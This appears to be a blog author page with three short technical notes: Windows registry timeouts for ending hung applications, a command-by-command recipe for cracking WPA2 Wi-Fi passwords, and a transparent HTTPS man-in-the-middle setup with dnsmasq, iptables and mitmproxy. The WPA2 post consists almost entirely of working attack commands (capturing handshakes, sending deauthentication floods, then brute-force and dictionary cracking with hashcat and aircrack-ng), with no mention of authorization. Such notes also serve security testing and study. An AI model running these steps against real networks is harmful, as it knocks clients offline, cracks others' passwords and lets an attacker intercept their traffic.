All posts by RSR

Windows11 AutoEndTasks and kill timeout

윈도 종료했다고 생각했는데 프로그램 하나가 종료되지 않아 PC가 계속 켜져있는 상황이 관찰되었다.

일정시간 대기하고 반응없으면 강제종료 했으면 하는데
일단 아래 레지 등록으로 해결되는지 확인 예정

It is possible to control how quickly windows automatically should end applications.

Windows can detect when an applications freezes if it don’t respond within a specific time, then prompt user:

[HKEY_CURRENT_USER \Control Panel \Desktop]
HungAppTimeout = “2500” (Default = 5000, Min = 1, Max = 65536)

Windows can be told to automatically close freezed applications without asking user first:

[HKEY_CURRENT_USER \Control Panel \Desktop]
AutoEndTasks = “1” (Default = 0, Enable = 1, Disable = 0)

Windows can force close applications at shutdown which don’t close within a specific time :

[HKEY_CURRENT_USER \Control Panel \Desktop]
WaitToKillAppTimeout = “10000” (Default = 20000, Min = 1, Max = 65536)

Note if lowering the timeout values too much, then it might lead to improper shutdown of the applications, which might lead to half-written/ invalid / faulty data that will keep the application from starting properly again.

 

https://smallvoid.com/article/windows-application-timeout.html

WPA2 Crack with hashcat

WPA2는 인증할때 salt와 kdf2값의 패킷을 수집하여 이를 BF 또는 Dict 공격하는 방법이 있다.

Enter wlan interface to monitor mode

airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]

Scan APs

airodump-ng -c 5 wlp4s0mo [–band a (for 5ghz)]
airodump-ng –bssid [bssid] -c 6 –write packet wlp4s0mo

Send Deauth Packet

aireplay-ng –deauth 100 -a [Station] wlp4s0mo

Convert cap to haccpx – out dated way

cap2hccapx.bin packet-01.cap out.haccpx

Convert cap to hc22000

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

Run hashcat

hashcat -m 2500 out.hccapx -a3 -?d?d?d?d?d?d?d?d -w3

hashcat -m 22000 hash.hc22000 wordlist.txt

or use aircrack-ng

$ aircrack-ng dumpfile.pcapng -w wordlist.txt

HTTPS MITM with transparent mode

 

set ipaddress for client adaptor

Edit /etc/network/interfaces:

# Proxy Server network interface
auto eth1
iface eth1 inet static
address 192.168.3.1
netmask 255.255.255.0
gateway 0.0.0.0

solve 53 port confiliction

# vi /etc/systemd/resolved.conf   > DNSStubListener=no
# systemctl restart systemd-resolved

config dnsmasq

Then replace /etc/dnsmasq.conf with:

# Listen for DNS requests on the internal network
interface=eth1
# Act as a DHCP server, assign IP addresses to clients
dhcp-range=192.168.3.10,192.168.3.100,96h
# Broadcast gateway and dns server information
dhcp-option=option:router,192.168.3.1
dhcp-option=option:dns-server,192.168.3.1

# systemctl restart dnsmasq

Sysctls

sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0

Rrerouting

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080

Start mitmproxy

$ mitmweb --mode transparent --showhost

https://docs.mitmproxy.org/stable/concepts-modes/#socks-proxy

https://docs.mitmproxy.org/stable/howto-transparent/

https://nickcharlton.net/posts/transparent-proxy-virtual-machines-mitmproxy.html